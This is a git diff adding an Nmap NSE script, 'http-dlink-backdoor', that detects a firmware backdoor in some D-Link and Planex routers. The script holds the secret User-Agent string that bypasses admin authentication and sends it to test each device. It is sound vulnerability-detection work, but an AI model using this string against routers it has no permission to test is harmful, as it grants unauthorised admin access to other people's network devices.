diff --git a/CHANGELOG b/CHANGELOG index b66692681..2a8541d47 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,8 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE] Add http-dlink-backdoor script that detects DLink routers with firmware + backdoor allowing admin access over HTTP interface. [Patrik Karlsson] + o The ICMP ID of ICMP probes is now matched against the sent ICMP ID, to reduce the chance of false matches. Patch by Chris Johnson. diff --git a/scripts/http-dlink-backdoor.nse b/scripts/http-dlink-backdoor.nse new file mode 100644 index 000000000..2f8ce2650 --- /dev/null +++ b/scripts/http-dlink-backdoor.nse @@ -0,0 +1,71 @@ +description = [[ +Detects a firmware backdoor on some D-Link routers by changing the User-Agent +to a "secret" value. Using the "secret" User-Agent bypasses authentication +and allows admin access to the router. + +The following router models are likely to be vulnerable: DIR-100, DIR-120, +DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240 + +In addition, several Planex routers also appear to use the same firmware: +BRL-04UR, BRL-04CW + +Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ +]] + +--- +-- @usage +-- nmap -sV --script http-dlink-backdoor +-- +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-dlink-backdoor: +-- | VULNERABLE: +-- | Firmware backdoor in some models of D-Link routers allow for admin password bypass +-- | State: VULNERABLE +-- | Risk factor: High +-- | Description: +-- | D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string. +-- | +-- | References: +-- |_ http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ +--- + +author = "Patrik Karlsson " +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"exploit","vuln"} + +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local vulns = require "vulns" + +portrule = shortport.http + +action = function(host, port) + local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true }) + local server = response.header and response.header['server'] + local vuln_table = { + title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass", + state = vulns.STATE.NOT_VULN, + risk_factor = "High", + description = [[ +D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string. +]], + references = { + 'http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/', + } + } + if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or + ( response.status == 302 and server:match("^Alpha_webserv") ) then + response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } }) + + if ( response.status == 200 ) then + vuln_table.state = vulns.STATE.VULN + local report = vulns.Report:new(SCRIPT_NAME, host, port) + return report:make_output(vuln_table) + end + end + return +end diff --git a/scripts/script.db b/scripts/script.db index 7fae7b4da..aa65a873e 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -149,6 +149,7 @@ Entry { filename = "http-csrf.nse", categories = { "exploit", "intrusive", "vuln Entry { filename = "http-date.nse", categories = { "discovery", "safe", } } Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "safe", } } Entry { filename = "http-devframework.nse", categories = { "discovery", "intrusive", } } +Entry { filename = "http-dlink-backdoor.nse", categories = { "exploit", "vuln", } } Entry { filename = "http-dombased-xss.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } } Entry { filename = "http-drupal-enum-users.nse", categories = { "discovery", "intrusive", } }